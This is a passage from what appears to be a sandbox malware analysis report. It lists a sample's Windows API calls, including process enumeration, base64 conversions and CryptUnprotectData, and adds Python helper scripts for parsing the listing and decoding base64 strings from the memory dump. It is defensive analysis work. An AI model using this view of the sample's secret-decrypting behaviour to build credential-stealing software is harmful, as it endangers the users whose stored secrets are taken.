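#   • Part of subcall function 003C7310: lstrlen.KERNEL32(------,003A5BEB), ref: 003C731B
#   • LocalFree.KERNEL32 ref: 003A9B70          (no argument list recovered)
_LINE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]                     # raw tokens; '?' and '------' mean "not recovered"
    ref: int                            # address of the call site
    subcall_of: Optional[int] = None    # set when the call happens inside a callee

def parse_api_listing(text: str) -> List[ApiCall]:
    calls = []
    for line in text.splitlines():
        m = _LINE.match(line)
        if not m:
            continue                    # headings such as "APIs" or "Memory Dump Source"
        raw = m.group("args") or ""
        args = [a.strip() for a in raw.split(",")] if raw else []
        sub = int(m.group("sub"), 16) if m.group("sub") else None
        calls.append(ApiCall(m.group("api"), m.group("mod"), args, int(m.group("ref"), 16), sub))
    return calls

def hex_arg(call: ApiCall, i: int) -> Optional[int]:
    """Argument i as an integer, or None when the report could not recover it."""
    try:
        return int(call.args[i], 16)
    except (IndexError, ValueError):
        return None

PROCESS_WALK = ("CreateToolhelp32Snapshot", "Process32First", "Process32Next", "CloseHandle")

def find_process_walk(calls: List[ApiCall]) -> dict:
    """Check that the function's own calls (subcalls excluded) contain the
    snapshot -> first -> next -> close sequence in order, and that the
    arguments match a process snapshot with an ANSI x86 PROCESSENTRY32."""
    direct = [c for c in calls if c.subcall_of is None]
    expected = 0
    for c in direct:                    # in-order subsequence match
        if expected < len(PROCESS_WALK) and c.api == PROCESS_WALK[expected]:
            expected += 1
    if expected < len(PROCESS_WALK):
        return {"enumerates_processes": False}
    by_name = {c.api: c for c in direct}
    return {
        "enumerates_processes": True,
        "snapshot_is_processes": hex_arg(by_name["CreateToolhelp32Snapshot"], 0) == TH32CS_SNAPPROCESS,
        "pe32_size_matches": hex_arg(by_name["Process32First"], 1) == SIZEOF_PROCESSENTRY32_ANSI_X86,
        "loop_body_at": by_name["Process32Next"].ref,
        "string_helpers_called": sorted({c.api for c in calls if c.subcall_of is not None}),
    }

# The listing of the function above, copied from this report.
REPORT_LISTING = """
  • Part of subcall function 003C71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 003C71FE
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 003C3A96
• Process32First.KERNEL32(00000000,00000128), ref: 003C3AA9
• Process32Next.KERNEL32(00000000,00000128), ref: 003C3ABF
  • Part of subcall function 003C7310: lstrlen.KERNEL32(------,003A5BEB), ref: 003C731B
  • Part of subcall function 003C7310: lstrcpy.KERNEL32(00000000), ref: 003C733F
  • Part of subcall function 003C7310: lstrcat.KERNEL32(?,------), ref: 003C7349
  • Part of subcall function 003C7280: lstrcpy.KERNEL32(00000000), ref: 003C72AE
• CloseHandle.KERNEL32(00000000), ref: 003C3BF7
"""

if __name__ == "__main__":
    for key, value in find_process_walk(parse_api_listing(REPORT_LISTING)).items():
        if isinstance(value, int) and not isinstance(value, bool):
            print(f"{key}: {value:#x}")
        else:
            print(f"{key}: {value}")
```

The "loop_body_at" address is where the Process32Next call sits; the string helpers listed as subcalls (lstrcpy, lstrcat, lstrlen) are what runs on each PROCESSENTRY32.szExeFile, which is the place to look for the process-name comparisons the signature refers to.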
                          APIs
                          • lstrlen.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 003AEA76
                          • CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 003AEA7E
                          • lstrcat.KERNEL32(003CCFEC,003CCFEC), ref: 003AEB27
                          • lstrcat.KERNEL32(003CCFEC,003CCFEC), ref: 003AEB49
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                           • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$BinaryCryptStringlstrlen
                          • String ID:
                          • API String ID: 189259977-0
                          • Opcode ID: 07ffec56fe4a2f75232fcbd212a5bf951bc5372c86fa995ad1d618627dc638bd
                          • Instruction ID: 2e47d1b003efbfccd61035ebbc03c7be19449a39390cc15ecda1386fbf363f81
                          • Opcode Fuzzy Hash: 07ffec56fe4a2f75232fcbd212a5bf951bc5372c86fa995ad1d618627dc638bd
                          • Instruction Fuzzy Hash: 7131A175A15119ABDB209B58EC49FEEB76DDB84705F0441AAFA09E3240DBB05A088BA1
                          APIs
                          • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 003C40CD
                          • GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 003C40DC
                          • RtlAllocateHeap.NTDLL(00000000), ref: 003C40E3
                          • CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 003C4113
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                           • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: BinaryCryptHeapString$AllocateProcess
                          • String ID:
                          • API String ID: 3825993179-0
                          • Opcode ID: d34db7295dfe115aa31d8b407ca75ecc7cca9a8998a02fef77c705858bb542ef
                          • Instruction ID: 5645fefde325a5bc8063bcc266599140b17ff5f22fd132550a8d1cb6623bbbea
                          • Opcode Fuzzy Hash: d34db7295dfe115aa31d8b407ca75ecc7cca9a8998a02fef77c705858bb542ef
                          • Instruction Fuzzy Hash: 5D015A70601205BBDB209FA5EC99FAABBADEF94311F10805ABE08C7240DA719D40DBA0
                          APIs
                          • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 003A9B3B
                          • LocalAlloc.KERNEL32(00000040,00000000), ref: 003A9B4A
                          • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 003A9B61
                          • LocalFree.KERNEL32 ref: 003A9B70
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                           • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: BinaryCryptLocalString$AllocFree
                          • String ID:
                          • API String ID: 4291131564-0
                          • Opcode ID: e75d3e705bf4610df278464fda75e649d93f5db4a82c0c73005cb98f304ce75e
                          • Instruction ID: 5b1f6e8738f0f0e6f5525b0436efcb9cd56af808fddcbdd48734411fa6e8ee32
                          • Opcode Fuzzy Hash: e75d3e705bf4610df278464fda75e649d93f5db4a82c0c73005cb98f304ce75e
                          • Instruction Fuzzy Hash: 6CF01D703423126BE7311F65AC49F567BA8EF15B50F210116FA45EA2D0D7B09844CAA4
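The three crypt32 functions listed above (lstrlen/CryptStringToBinaryA/lstrcat at 003AEA76, CryptBinaryToStringA with heap allocation at 003C40CD, and CryptStringToBinaryA with LocalAlloc at 003A9B3B) share one pattern: dwFlags 0x1 is CRYPT_STRING_BASE64, 0x40000001 adds CRYPT_STRING_NOCRLF, and each conversion is called twice, first with a NULL output buffer to learn the size, then again after allocating it (LocalAlloc(0x40, n) is LMEM_ZEROINIT; the heap variant goes through GetProcessHeap/RtlAllocateHeap). The following script is an added example, not code from the sample or from Windows: it reproduces those flag semantics in Python so base64 strings recovered from the dump can be decoded offline exactly as the sample would decode them, including the 64-column CRLF wrapping that CryptBinaryToStringA applies when NOCRLF is absent.

```python
"""Emulate the crypt32 string/binary conversions the sample calls, so that
strings recovered from the memory dump can be decoded offline with the same
flag semantics.  Added example, not code from the sample or from Windows;
the line wrapping modelled here is the documented CryptBinaryToStringA
behaviour for CRYPT_STRING_BASE64."""
import base64

# dwFlags layout (wincrypt.h): low byte selects the format, high bits modify it.
CRYPT_STRING_FORMATS = {
    0x0: "BASE64HEADER", 0x1: "BASE64", 0x2: "BINARY", 0x3: "BASE64REQUESTHEADER",
    0x4: "HEX", 0x5: "HEXASCII", 0x6: "BASE64_ANY", 0x7: "ANY", 0x8: "HEX_ANY",
    0x9: "BASE64X509CRLHEADER", 0xA: "HEXADDR", 0xB: "HEXASCIIADDR", 0xC: "HEXRAW",
}
CRYPT_STRING_STRICT = 0x20000000
CRYPT_STRING_NOCRLF = 0x40000000   # do not break the output into 64-char lines
CRYPT_STRING_NOCR = 0x80000000     # use LF instead of CRLF as line terminator
LMEM_ZEROINIT = 0x0040             # LocalAlloc flag seen next to the decode call

def describe_flags(dw_flags: int) -> str:
    """Name the flags, e.g. 0x40000001 -> 'CRYPT_STRING_BASE64 | CRYPT_STRING_NOCRLF'."""
    fmt = dw_flags & 0xFF
    names = ["CRYPT_STRING_" + CRYPT_STRING_FORMATS.get(fmt, f"UNKNOWN_{fmt:#x}")]
    for bit, name in ((CRYPT_STRING_STRICT, "CRYPT_STRING_STRICT"),
                      (CRYPT_STRING_NOCRLF, "CRYPT_STRING_NOCRLF"),
                      (CRYPT_STRING_NOCR, "CRYPT_STRING_NOCR")):
        if dw_flags & bit:
            names.append(name)
    return " | ".join(names)

def crypt_binary_to_string(data: bytes, dw_flags: int) -> str:
    """CryptBinaryToStringA for the BASE64 format: without NOCRLF the output is
    cut into 64-character lines and every line, the last included, ends in
    CRLF (LF when NOCR is set)."""
    if dw_flags & 0xFF != 0x1:
        raise NotImplementedError(describe_flags(dw_flags))
    b64 = base64.b64encode(data).decode("ascii")
    if dw_flags & CRYPT_STRING_NOCRLF:
        return b64
    eol = "\n" if dw_flags & CRYPT_STRING_NOCR else "\r\n"
    return "".join(b64[i:i + 64] + eol for i in range(0, len(b64), 64))

def required_cch(data: bytes, dw_flags: int) -> int:
    """What the first (pszString == NULL) call returns in *pcchString: the
    output length plus the terminating NUL, which is the size the sample
    takes from the process heap before calling again."""
    return len(crypt_binary_to_string(data, dw_flags)) + 1

def crypt_string_to_binary(text: str, dw_flags: int) -> bytes:
    """CryptStringToBinaryA for the BASE64 format: whitespace and line breaks
    between the base64 characters are skipped, invalid characters fail."""
    if dw_flags & 0xFF != 0x1:
        raise NotImplementedError(describe_flags(dw_flags))
    compact = "".join(text.split())
    try:
        return base64.b64decode(compact, validate=True)
    except ValueError as exc:
        raise ValueError("ERROR_INVALID_DATA: not base64") from exc

def two_call_decode(text: str, dw_flags: int = 0x1):
    """The size-query / allocate / decode sequence visible in the listing:
    call 1 with pbBinary == NULL returns the byte count in *pcbBinary,
    LocalAlloc(LMEM_ZEROINIT, count) reserves it, call 2 fills it."""
    count = len(crypt_string_to_binary(text, dw_flags))    # call 1
    buffer = bytearray(count)                               # LocalAlloc(0x40, count)
    buffer[:] = crypt_string_to_binary(text, dw_flags)      # call 2
    return count, bytes(buffer)

if __name__ == "__main__":
    # Constructed input: what CryptBinaryToStringA(…, 0x1) produces for 49 bytes.
    sample = crypt_binary_to_string(b"A" * 49, 0x1)
    print(describe_flags(0x40000001))
    print(repr(sample), required_cch(b"A" * 49, 0x1))
    print(two_call_decode(sample))
```

When carving base64 out of the dump, the flag value tells you which shape to expect: 0x40000001 output is a single unbroken line, 0x1 output carries CRLF every 64 characters and a trailing CRLF, so a regex built for one will miss the other.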
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                           • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: r~~$?{W{$O<`H
                          • API String ID: 0-2708903877
                          • Opcode ID: aef69b52be0866f01c0398687f1d592ecf12374df4ce09ca3cadb6e7b011b671
                          • Instruction ID: 736246d3dd0a1346aa8c3365016eac8863fdadf30a8cfd9385538929f549e43e
                          • Opcode Fuzzy Hash: aef69b52be0866f01c0398687f1d592ecf12374df4ce09ca3cadb6e7b011b671
                          • Instruction Fuzzy Hash: A9B249F3A0C2149FE304AE2DEC8567AFBE9EBD4320F1A453DEAC4D3744E57598058692
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                           • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: i5${l{$V$m
                          • API String ID: 0-708431156
                          • Opcode ID: a34ba9a2d7060fcba6f50a26d63bd39a687a4aefd8bf99bd91dc6c0362502720
                          • Instruction ID: 46af87431cede8064691f59ad6a31243b7c73cec44690f7f2baf785e27eae443
                          • Opcode Fuzzy Hash: a34ba9a2d7060fcba6f50a26d63bd39a687a4aefd8bf99bd91dc6c0362502720
                          • Instruction Fuzzy Hash: 5292F5F360C2049FE304AE29EC8567ABBE9EF94720F1A493DE6C4C7340E67598158797
                          APIs
                          • CoCreateInstance.COMBASE(003CB110,00000000,00000001,003CB100,?), ref: 003BCB06
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 003BCB46
                          • lstrcpyn.KERNEL32(?,?,00000104), ref: 003BCBC9
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                           • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharCreateInstanceMultiWidelstrcpyn
                          • String ID:
                          • API String ID: 1940255200-0
                          • Opcode ID: b95cacfccd0d53f0fd994ac3a476d472b9455083340965115ea6b768de11069f
                          • Instruction ID: 9578145b5b757cac9798893b0339e5326aea13ad8140063b82b24e4ad6a90899
                          • Opcode Fuzzy Hash: b95cacfccd0d53f0fd994ac3a476d472b9455083340965115ea6b768de11069f
                          • Instruction Fuzzy Hash: 66316471A40215BFD711DB94CC92FEEB7B99B88B14F104184FA04EB2D0D7B0AE44CB90
                          APIs
                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 003A9B9F
                          • LocalAlloc.KERNEL32(00000040,?), ref: 003A9BB3
                          • LocalFree.KERNEL32(?), ref: 003A9BD7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                           • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$AllocCryptDataFreeUnprotect
                          • String ID:
                          • API String ID: 2068576380-0
                          • Opcode ID: f2bd9cd38353a781f0fe512972ddc749723cd2f75aaaa039c311ff7c3e34726c
                          • Instruction ID: c383513fabbac5fec41b1d522fd751935278916a3086d7432542d107fef73302
                          • Opcode Fuzzy Hash: f2bd9cd38353a781f0fe512972ddc749723cd2f75aaaa039c311ff7c3e34726c
                          • Instruction Fuzzy Hash: 6F011275E4130AABD7109BA4DC45FAEB778EB44700F104556EA04AB284DBB09D04C7E0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: @N3{
                          • API String ID: 0-4092127855
                          • Opcode ID: 4437ca4b8de9aa7e38a2f56db44b1abaa8c31c82b31de533734319bc9f537034
                          • Instruction ID: 2ef94e6b1204a1d4f4bdc666f8bbf9e34f114602a731908880622ee80841d362
                          • Opcode Fuzzy Hash: 4437ca4b8de9aa7e38a2f56db44b1abaa8c31c82b31de533734319bc9f537034
                          • Instruction Fuzzy Hash: 2D51F5B3A182044FF344AE29DC85376F7E2EBC4310F16853DDAC487384DE392C498646
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
